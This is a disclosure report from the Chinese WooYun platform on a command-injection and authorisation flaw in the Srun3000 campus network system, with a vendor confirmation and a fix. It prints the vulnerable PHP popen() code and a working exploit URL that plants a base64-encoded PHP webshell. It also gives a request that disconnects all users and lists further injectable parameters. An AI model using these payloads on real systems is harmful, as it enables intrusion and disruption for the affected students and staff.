当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062252

漏洞标题:Srun3000一处越权&命令执行&getshell(实例中影响几万师生数据告急)

相关厂商:srun.com

漏洞作者: HackPanda

提交时间:2014-05-25 17:24

修复时间:2014-08-23 17:26

公开时间:2014-08-23 17:26

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-25: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向第三方安全合作伙伴开放
2014-07-22: 细节向核心白帽子及相关领域专家公开
2014-08-01: 细节向普通白帽子公开
2014-08-11: 细节向实习白帽子公开
2014-08-23: 细节向公众公开

简要描述:

深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的

详细说明:

先看源码,简单粗暴命令执行,但是没给审核,于是就有了后文

switch ( $_GET['action'] )
{
				case "drop_user" :
								if ( $_GET['ipv'] == "ipv4" )
								{
												if ( $_GET['uname1'] == "-all" )
												{
																$pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行
												}
												else
												{
																$pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" );
																udp_send( $_GET['ip'], 10333, "0&您已被强制断线" );
												}
								}							}
}


漏洞证明:

实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。
根据源码
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic (已删除)

web.png


还有越权 可以踢掉所有人。
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=-all

.png


影响数据

.png


ps:这句话一会可以删掉:后面还有几个命令执行的地方每个都需要这样写实例吗?麻烦狗哥了。
注:经测试
action=drop_user1、action=dm_drop_user&sid=、action=rad_drop_user&uname1=、action=rad_drop_user1&uname1=、action=disable_user&uname1=
等 都存在命令执行漏洞 请官方自查

修复方案:

过滤命令执行的地方。

版权声明:转载请注明来源 HackPanda@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-28 16:35

厂商回复:

该漏洞为用户自服务漏洞出现在版本14.12,在14.17.5版本中修正。非常感谢

最新状态:

暂无